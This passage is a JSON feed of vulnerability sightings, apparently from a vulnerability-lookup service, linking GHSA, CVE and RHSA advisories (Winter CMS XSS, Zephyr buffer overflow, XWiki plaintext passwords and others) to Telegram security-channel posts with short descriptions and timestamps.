"GHSA-CW2R-4P82-QV79", "type": "seen", "source": "https://t.me/ctinow/160128", "content": "https://ift.tt/0Un1sBr\n[GHSA-cw2r-4p82-qv79] DoS with algorithms that use PBKDF2 due to unbounded PBES2 Count value", "creation_timestamp": "2023-12-28T17:46:27.000000Z"}, {"uuid": "8ec33103-8552-4ad1-93ca-8e8c6c3477ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3082", "type": "seen", "source": "https://t.me/ctinow/164333", "content": "https://ift.tt/Zjw0P8V\nCVE-2019-14838 | wildfly-core up to 7.2.4 improper authentication (RHSA-2019:3082)", "creation_timestamp": "2024-01-08T13:36:46.000000Z"}, {"uuid": "6dd57a81-9739-4e6c-9ceb-6ae46f6cc753", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9763-4F94-GFCH", "type": "seen", "source": "https://t.me/ctinow/164529", "content": "https://ift.tt/RagbJrB\n[GHSA-9763-4f94-gfch] CIRCL's Kyber: timing side-channel (kyberslash2)", "creation_timestamp": "2024-01-08T17:56:46.000000Z"}, {"uuid": "18c98110-f43c-456f-85f8-94d62866005e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ6H-JJG2-7GF3", "type": "seen", "source": "https://t.me/ctinow/158764", "content": "https://ift.tt/pSDCzlO\nCVE-2023-48315 | azure-rtos netxduo up to 6.2.1 expired pointer dereference (GHSA-rj6h-jjg2-7gf3)", "creation_timestamp": "2023-12-23T10:21:56.000000Z"}, {"uuid": "61cd2f33-eb65-4d69-9809-a8c7b9b4eed2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FGWC-3J6W-CH22", "type": "seen", "source": "https://t.me/ctinow/160677", "content": "https://ift.tt/46LSOxG\n[GHSA-fgwc-3j6w-ch22] easy-rules-mvel vulnerable to remote code execution", "creation_timestamp": "2023-12-29T20:56:05.000000Z"}, {"uuid": "f472ec30-7395-4341-a0c0-dd9af84f4572", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4J8W-P6HV-3QXC", "type": "seen", "source": "https://t.me/ctinow/160674", "content": "https://ift.tt/IUHku2K\n[GHSA-4j8w-p6hv-3qxc] Cross-Site Request Forgery (CSRF) in automad/automad", "creation_timestamp": "2023-12-29T20:46:41.000000Z"}, {"uuid": "87f3044d-cd99-4e22-98e8-e274dee879f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q5Q3-QM26-9JWM", "type": "seen", "source": "https://t.me/ctinow/160673", "content": "https://ift.tt/pD3XHZb\n[GHSA-q5q3-qm26-9jwm] Authenticated Blind SSRF in automad/automad", "creation_timestamp": "2023-12-29T20:46:40.000000Z"}, {"uuid": "599895f4-7617-47c8-948f-875b9aeee7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JPVW-P8PR-9G2X", "type": "seen", "source": "https://t.me/ctinow/160660", "content": "https://ift.tt/oj2n5M9\n[GHSA-jpvw-p8pr-9g2x] Ansible symlink attack vulnerability", "creation_timestamp": "2023-12-29T19:26:07.000000Z"}, {"uuid": "1678b366-73ea-4972-a24c-881c2257ff47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7HFX-H3J3-RWQ4", "type": "seen", "source": "https://t.me/ctinow/163752", "content": "https://ift.tt/DvVmQn3\n[GHSA-7hfx-h3j3-rwq4] D-Tale server-side request forgery through Web uploads", "creation_timestamp": "2024-01-05T22:31:53.000000Z"}, {"uuid": "0558b866-332b-4cd1-a139-2a3228abb106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F23H-52HJ-99P6", "type": "seen", "source": "https://t.me/ctinow/157908", "content": "https://ift.tt/zUMYxQI\n[GHSA-f23h-52hj-99p6] Apache IoTDB: Unsafe deserialize map in Sync Tool", "creation_timestamp": "2023-12-21T19:26:40.000000Z"}, {"uuid": "64b4c5cd-ed9f-488e-b091-964a747aa036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQJ5-37XF-X5GC", "type": "seen", "source": "https://t.me/ctinow/157907", "content": "https://ift.tt/LHZC207\n[GHSA-pqj5-37xf-x5gc] blinksocks has weak encryption algorithms", "creation_timestamp": "2023-12-21T19:26:39.000000Z"}, {"uuid": "d9b3e58a-bffc-48dc-8ff8-373773fe1d70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4192", "type": "seen", "source": "https://t.me/ctinow/164253", "content": "https://ift.tt/BguFqMs\nCVE-2019-17531 | FasterXML jackson-databind up to 2.9.10 JSON Endpoint input validation (RHSA-2019:4192)", "creation_timestamp": "2024-01-08T10:11:23.000000Z"}, {"uuid": "c2434aba-e4bc-4011-a5f3-8fb1881255d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C2V4-CHX5-VFF6", "type": "seen", "source": "https://t.me/ctinow/163587", "content": "https://ift.tt/v89XAPk\n[GHSA-c2v4-chx5-vff6] Duplicate Advisory: Integer overflow in cmark-gfm table parsing extension leads to heap memory corruption", "creation_timestamp": "2024-01-05T16:46:41.000000Z"}, {"uuid": "02b6f337-230f-429e-b8cd-ceff2bde40ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4MVM-XH8J-FV27", "type": "seen", "source": "https://t.me/ctinow/163579", "content": "https://ift.tt/i2fjuBU\n[GHSA-4mvm-xh8j-fv27] Duplicate Advisory: govuk_tech_docs vulnerable to unescaped HTML on search results page", "creation_timestamp": "2024-01-05T16:32:04.000000Z"}, {"uuid": "13f9ff62-eb36-44d7-90e2-84a226b33768", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V444-JGGX-6V7F", "type": "seen", "source": "https://t.me/ctinow/163578", "content": "https://ift.tt/ocj56VZ\n[GHSA-v444-jggx-6v7f] Duplicate Advisory: Race Condition leading to logging errors", "creation_timestamp": "2024-01-05T16:32:02.000000Z"}, {"uuid": "863cf062-5e30-4c42-9da9-018fe1ce5118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43W4-4J3C-JX29", "type": "seen", "source": "https://t.me/ctinow/160250", "content": "https://ift.tt/LIHT9Bz\n[GHSA-43w4-4j3c-jx29] Winter CMS Stored XSS through Backend ColorPicker FormWidget", "creation_timestamp": "2023-12-28T23:46:14.000000Z"}, {"uuid": "d3a9d876-1da9-4ef7-b441-7e7a0cc44610", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4WVW-75QH-FQJP", "type": "seen", "source": "https://t.me/ctinow/160249", "content": "https://ift.tt/XEIDTWA\n[GHSA-4wvw-75qh-fqjp] Winter CMS Stored XSS through privileged upload of Media Manager file followed by renaming", "creation_timestamp": "2023-12-28T23:46:12.000000Z"}, {"uuid": "e5fca549-dd19-4731-921d-4bd2431a4dce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHHP-C3CM-2R86", "type": "seen", "source": "https://t.me/ctinow/159046", "content": "https://ift.tt/lUO4wMv\nCVE-2023-49283 | Microsoft Graph msgraph-sdk-php-core up to 2.0.1 GetPhpInfo.php phpInfo information disclosure (GHSA-mhhp-c3cm-2r86)", "creation_timestamp": "2023-12-24T15:26:30.000000Z"}, {"uuid": "bd27862a-9760-4d58-888a-a6554c7d183c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37VQ-HR2F-G7H7", "type": "seen", "source": "https://t.me/ctinow/158282", "content": "https://ift.tt/nJuKxyo\nCVE-2023-49093 | HtmlUnit up to 3.8.x XSTL code injection (GHSA-37vq-hr2f-g7h7)", "creation_timestamp": "2023-12-22T09:51:44.000000Z"}, {"uuid": "b78a9e95-468a-4c31-bb2a-ac011c196cb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7M48-WC93-9G85", "type": "seen", "source": "https://t.me/ctinow/158250", "content": "https://ift.tt/Ip3sh7V\nCVE-2023-44402 | Electron up to 23.3.13 data authenticity (GHSA-7m48-wc93-9g85)", "creation_timestamp": "2023-12-22T08:51:39.000000Z"}, {"uuid": "1fd70d88-3237-4957-ae28-23146fa5e8e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6GGR-CWV4-G7QG", "type": "seen", "source": "https://t.me/ctinow/158067", "content": "https://ift.tt/LpNHEeX\n[GHSA-6ggr-cwv4-g7qg] Remotely exploitable denial of service in Rosenpass", "creation_timestamp": "2023-12-22T00:22:14.000000Z"}, {"uuid": "9fda356c-aa8a-431d-b651-55d24e097f65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557V-XCG6-RM5M", "type": "seen", "source": "https://t.me/ctinow/158066", "content": "https://ift.tt/7Oerdvg\n[GHSA-557v-xcg6-rm5m] Potential URI resolution path traversal in the AWS SDK for PHP", "creation_timestamp": "2023-12-22T00:22:13.000000Z"}, {"uuid": "7b25c832-f88f-4fff-85ae-4ff28e71f0fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5938-79HG-XH3Q", "type": "seen", "source": "https://t.me/ctinow/157906", "content": "https://ift.tt/y9dAINk\n[GHSA-5938-79hg-xh3q] Apache Airflow Improper Access Control vulnerability", "creation_timestamp": "2023-12-21T19:26:38.000000Z"}, {"uuid": "6247445c-8520-4a1a-a184-3b40e76cceed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQQW-R8C5-J67C", "type": "seen", "source": "https://t.me/ctinow/158244", "content": "https://ift.tt/qAGKriB\nCVE-2023-46746 | posthog up to 1.43.1 POST Request server-side request forgery (GHSA-wqqw-r8c5-j67c)", "creation_timestamp": "2023-12-22T08:51:31.000000Z"}, {"uuid": "64637ff5-b9c7-4430-b548-8682fd8a3ee7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R8J9-5CJ7-CV39", "type": "seen", "source": "https://t.me/ctinow/158232", "content": "https://ift.tt/76fiWLk\nCVE-2023-49277 | DarrenOfficial dpaste up to 3.7 API cross site scripting (GHSA-r8j9-5cj7-cv39)", "creation_timestamp": "2023-12-22T08:21:41.000000Z"}, {"uuid": "9220ae26-ea6e-44ff-9d01-063da6fb1b88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6QM2-WPXQ-7QH2", "type": "seen", "source": "https://t.me/ctinow/157912", "content": "https://ift.tt/ysRvVc4\n[GHSA-6qm2-wpxq-7qh2] Gradio makes the `/file` secure against file traversal and server-side request forgery attacks", "creation_timestamp": "2023-12-21T19:36:55.000000Z"}, {"uuid": "455a2de5-fd6f-4f4f-b443-b2ca56cbb530", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MPWQ-J3XF-7M5W", "type": "seen", "source": "https://t.me/ctinow/157911", "content": "https://ift.tt/jWd5apm\n[GHSA-mpwq-j3xf-7m5w] The redirect_uri validation logic allows for bypassing explicitly allowed hosts that would otherwise be restricted", "creation_timestamp": "2023-12-21T19:36:53.000000Z"}, {"uuid": "b4b8a454-1088-4ec4-92d7-7856358a3d6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R24F-HG58-VFRW", "type": "seen", "source": "https://t.me/ctinow/157909", "content": "https://ift.tt/fQFovls\n[GHSA-r24f-hg58-vfrw] unsafe-libyaml unaligned write of u64 on 32-bit and 16-bit platforms", "creation_timestamp": "2023-12-21T19:26:41.000000Z"}, {"uuid": "da7f3e3c-1590-4b70-9f2b-1465acdbd02d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3PJV-R7W4-2CF5", "type": "seen", "source": "https://t.me/ctinow/157346", "content": "https://ift.tt/0cKdxR3\n[GHSA-3pjv-r7w4-2cf5] Grails data binding causes JVM crash and/or DoS", "creation_timestamp": "2023-12-20T22:22:33.000000Z"}, {"uuid": "34e919d5-26eb-4ef2-abcc-0512e27254d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2274-3hgr-wxv6", "type": "seen", "source": "https://gist.github.com/webcpu/7c928d4740d4b4330646df1041a5ee1e", "content": "", "creation_timestamp": "2026-04-30T08:15:26.000000Z"}, {"uuid": "259bcd1b-5e93-4149-bd5a-4ceec7ad309c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RFV9-X7HH-XC32", "type": "seen", "source": "https://t.me/cibsecurity/60973", "content": "\u203c CVE-2023-28427 \u203c\n\nmatrix-js-sdk is a Matrix messaging protocol Client-Server SDK for JavaScript. In versions prior to 24.0.0 events sent with special strings in key places can temporarily disrupt or impede the matrix-js-sdk from functioning properly, potentially impacting the consumer's ability to process data safely. Note that the matrix-js-sdk can appear to be operating normally but be excluding or corrupting runtime data presented to the consumer. This vulnerability is distinct from GHSA-rfv9-x7hh-xc32 which covers a similar issue. The issue has been patched in matrix-js-sdk 24.0.0 and users are advised to upgrade. There are no known workarounds for this vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-03-29T00:49:54.000000Z"}, {"uuid": "28549f01-c94f-4af3-bec8-dc130c68bfb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-599V-W48H-RJRM", "type": "seen", "source": "https://t.me/cibsecurity/53461", "content": "\u203c CVE-2022-41933 \u203c\n\nXWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. When the `reset a forgotten password` feature of XWiki was used, the password was then stored in plain text in database. This only concerns XWiki 13.1RC1 and newer versions. Note that it only concerns the reset password feature available from the \"Forgot your password\" link in the login view: the features allowing a user to change their password, or for an admin to change a user password are not impacted. This vulnerability is particularly dangerous in combination with other vulnerabilities allowing to perform data leak of personal data from users, such as GHSA-599v-w48h-rjrm. Note that this vulnerability only concerns the users of the main wiki: in case of farms, the users registered on subwiki are not impacted thanks to a bug we discovered when investigating this. The problem has been patched in version 14.6RC1, 14.4.3 and 13.10.8. The patch involves a migration of the impacted users as well as the history of the page, to ensure no password remains in plain text in the database. This migration also involves to inform the users about the possible disclosure of their passwords: by default, two emails are automatically sent to the impacted users. A first email to inform about the possibility that their password have been leaked, and a second email using the reset password feature to ask them to set a new password. It's also possible for administrators to set some properties for the migration: it's possible to decide if the user password should be reset (default) or if the passwords should be kept but only hashed. Note that in the first option, the users won't be able to login anymore until they set a new password if they were impacted. Note that in both options, mails will be sent to users to inform them and encourage them to change their passwords.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-11-24T00:14:06.000000Z"}, {"uuid": "89858faa-958d-4b03-96d2-9fd9083da060", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8W87-6RFP-CFRM", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/45338", "content": "\u203c CVE-2021-3434 \u203c\n\nStack based buffer overflow in le_ecred_conn_req(). Zephyr versions &gt;= v2.5.0 Stack-based Buffer Overflow (CWE-121). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-8w87-6rfp-cfrm\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-29T00:36:28.000000Z"}, {"uuid": "885caaa6-bffc-4457-9077-8db52996177b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3C2F-W4V6-QXRP", "type": "seen", "source": "https://t.me/cibsecurity/45331", "content": "\u203c CVE-2021-3433 \u203c\n\nInvalid channel map in CONNECT_IND results to Deadlock. Zephyr versions &gt;= v2.5.0 Improper Check or Handling of Exceptional Conditions (CWE-703). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3c2f-w4v6-qxrp\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-29T00:36:21.000000Z"}, {"uuid": "66d46526-c825-406a-acb4-55df70edcab2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PJPP-CM9X-6RWJ", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2254", "content": "https://github.com/jumpserver/jumpserver/security/advisories/GHSA-pjpp-cm9x-6rwj\n\nCVE-2024-29201\n#github #poc", "creation_timestamp": "2024-04-06T03:59:54.000000Z"}]}